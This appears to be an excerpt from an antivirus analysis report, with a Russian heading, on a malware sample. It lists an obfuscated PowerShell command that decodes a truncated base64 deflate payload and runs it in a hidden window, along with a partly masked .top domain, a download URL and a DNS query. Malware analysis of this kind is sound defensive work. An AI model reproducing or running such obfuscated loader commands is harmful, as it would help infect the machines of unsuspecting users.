Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( NeW-objEcT Io.coMPresSiON.DeFLATestREAM([SyStEM.io.MEmORYSTream][CONvERT]::FrOmbaSe64StRiNG('VZBda8IwFIb/Si8KUZyJdfOjhoLDDzbmnOCG29hNTI822iYlPTUb4n9flTHw9rzP+8J5/JdZFmlwTbPegURvDkhXsB6lCjRy3+...
- '51##.top':80
- http://51##.top/McKisp86d3/
- DNS ASK 51##.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( NeW-objEcT Io.coMPresSiON.DeFLATestREAM([SyStEM.io.MEmORYSTream][CONvERT]::FrOmbaSe64StRiNG('VZBda8IwFIb/Si8KUZyJdfOjhoLDDzbmnOCG29hNTI822iYlPTUb4n9flTHw9rzP+8J5/JdZFmlwTbPegURvDkhXsB6lCjRy3+...' (со скрытым окном)